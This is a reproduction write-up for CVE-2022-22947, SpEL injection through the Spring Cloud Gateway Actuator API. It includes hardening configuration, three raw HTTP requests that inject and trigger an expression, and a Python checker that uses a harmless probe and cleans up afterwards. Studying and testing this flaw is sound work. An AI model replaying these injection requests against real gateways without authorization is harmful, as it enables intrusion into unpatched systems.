Contents
Vulnerability prerequisites
Spring Cloud Gateway 3.1.x before 3.1.1 (that is, 3.1.0)
Spring Cloud Gateway 3.0.x before 3.0.7 (3.0.0 through 3.0.6)
Older Spring Cloud Gateway release lines that are no longer maintained
and the Gateway Actuator endpoint (/actuator/gateway/**) is enabled, exposed over HTTP and reachable without authentication. Without that endpoint an attacker has no way to add a route, so the whole chain below depends on it.
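As an added example that is not part of the original post, here is the exposure that satisfies the prerequisite next to a hardened setting. The property names are the ones Spring Boot and Spring Cloud Gateway document; the management port value and the two-document layout are assumptions made for illustration.

```yaml
# Added example, not from the original post: application.yml of a Spring Boot app
# running Spring Cloud Gateway. First document = the exposed configuration that
# matches the post's precondition; second document = a hardened one.

# Exposed: the gateway endpoint is enabled and every actuator endpoint is served over
# the same port as the proxied traffic, with nothing requiring authentication.
management:
  endpoint:
    gateway:
      enabled: true          # /actuator/gateway/routes and /refresh are available
  endpoints:
    web:
      exposure:
        include: "*"         # every actuator endpoint reachable over HTTP
---
# Hardened: endpoint off, exposure is an explicit allow-list that does not contain
# "gateway", and the remaining endpoints are bound to a separate management port
# (9090 is an assumed value) that the public load balancer does not forward to.
management:
  endpoint:
    gateway:
      enabled: false
  endpoints:
    web:
      exposure:
        include: "health,info"
  server:
    port: 9090
```

The real fix is upgrading to 3.1.1 or 3.0.7; the configuration above only removes the precondition. If operations genuinely need the gateway endpoint, keep it enabled but put Spring Security in front of /actuator/** so that route changes require an authenticated, authorized caller.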
Reproduction
PoC: see https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947/blob/main/spring_cloud_RCE.py
First request
Second request
Echo
References:
Spring Cloud Gateway Actuator API SpEL expression injection command execution (CVE-2022-22947) - 火线 Zone cloud security community
First request: register a route whose AddResponseHeader filter argument carries a SpEL expression. At this point the value is only stored as part of the route definition; nothing is evaluated yet. (Content-Length must match the body actually sent; Burp and curl recompute it.)
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 303

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader(\"oh yes\",\"true\")}"}
  }],
  "uri": "http://example.com",
  "order": 0
}
Second request: trigger a route refresh. This is the step that evaluates the expression: the refresh rebuilds the routes, and the vulnerable versions parse the filter arguments as SpEL in an unrestricted evaluation context. It must go to the same gateway instance as the first request.
POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Echo (third request): read the route back. The response lists the route's filters in rendered form, with the injected expression already evaluated, so the expression's result is returned in the body. Use the same host as the previous two requests. When finished, remove the test route with DELETE /actuator/gateway/routes/hacktest followed by another refresh so the gateway is left as it was found.
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 0

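The three-step sequence above as a small checker, added here as an example; it is not the post's PoC nor the referenced script. It uses only the standard library and a side-effect-free probe (string concatenation, no T() calls) so that a hit proves SpEL evaluation without running a command, and it deletes the test route afterwards. BASE_URL, ROUTE_ID, MARKER and the sample read-back are assumed or constructed values; run it only against a lab instance.

```python
"""Added example, not from the original post: replay add-route -> refresh -> read-route
with a harmless SpEL probe, then remove the test route. BASE_URL, ROUTE_ID, MARKER and
SAMPLE_READBACK are assumptions/constructed values."""
import json
import urllib.request
from urllib.error import HTTPError, URLError

BASE_URL = "http://localhost:8080"   # assumed lab target
ROUTE_ID = "hacktest"                # assumed route id (same as the post's requests)
MARKER = "cve-2022-22947"            # assumed marker the probe should produce

# Constructed sample of a route read-back (GET /actuator/gateway/routes/<id>) in the
# shape the public write-ups show: the rendered filter carries the evaluated value.
SAMPLE_READBACK = json.dumps({
    "route_id": "hacktest",
    "filters": ["[[AddResponseHeader Result = 'cve-2022-22947'], order = 1]"],
    "uri": "http://example.com:80",
    "order": 0,
})


def probe_expression(marker, chunk=4):
    """Side-effect-free SpEL probe: only string literals joined with '+'.
    The marker is split into pieces so the contiguous marker never appears in the
    request; it can only show up in a response if the gateway evaluated the SpEL."""
    pieces = [marker[i:i + chunk] for i in range(0, len(marker), chunk)]
    return "#{" + " + ".join("'%s'" % p for p in pieces) + "}"


def build_route(route_id, expr, uri="http://example.com"):
    """Route definition in the shape of the post's first request; the expression
    goes into the AddResponseHeader filter's 'value' argument."""
    return {
        "id": route_id,
        "filters": [{"name": "AddResponseHeader",
                     "args": {"name": "Result", "value": expr}}],
        "uri": uri,
        "order": 0,
    }


def looks_evaluated(readback_body, marker, expr):
    """True when the read-back contains the contiguous marker although the raw
    expression does not: the gateway must have concatenated it, i.e. evaluated SpEL."""
    return marker not in expr and marker in readback_body


def _call(method, path, body=None):
    """One HTTP request to the gateway; JSON body only when one is given."""
    data = None
    headers = {}
    if body is not None:
        data = json.dumps(body).encode()
        headers["Content-Type"] = "application/json"
    req = urllib.request.Request(BASE_URL + path, data=data, headers=headers, method=method)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")


def check(route_id=ROUTE_ID, marker=MARKER):
    """Add route -> refresh -> read route, as in the post; always clean up afterwards."""
    expr = probe_expression(marker)
    route_path = "/actuator/gateway/routes/" + route_id
    try:
        _call("POST", route_path, build_route(route_id, expr))
        _call("POST", "/actuator/gateway/refresh")   # the refresh is where SpEL is evaluated
        _, body = _call("GET", route_path)
        return looks_evaluated(body, marker, expr)
    except (HTTPError, URLError) as err:
        print("request failed (endpoint not exposed, or not vulnerable):", err)
        return False
    finally:
        # DELETE is part of the gateway actuator API; a second refresh applies the removal.
        for method, path in (("DELETE", route_path), ("POST", "/actuator/gateway/refresh")):
            try:
                _call(method, path)
            except (HTTPError, URLError):
                pass


if __name__ == "__main__":
    expr = probe_expression(MARKER)
    print("probe:", expr)
    print("offline sample evaluated:", looks_evaluated(SAMPLE_READBACK, MARKER, expr))
    print("live check against", BASE_URL, "->", check())
```

The probe idea generalizes beyond this page's payload: any expression whose result cannot be found as a literal in the request (concatenation, arithmetic) is enough to confirm evaluation, and it leaves nothing behind once the route is deleted, which the command-executing payloads in the public PoCs do not guarantee.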
References:
CVE-2022-22947: SpEL Casting and Evil Beans – Wya.pl
Spring Cloud Gateway Actuator API SpEL expression injection command execution (CVE-2022-22947) - 火线 Zone cloud security community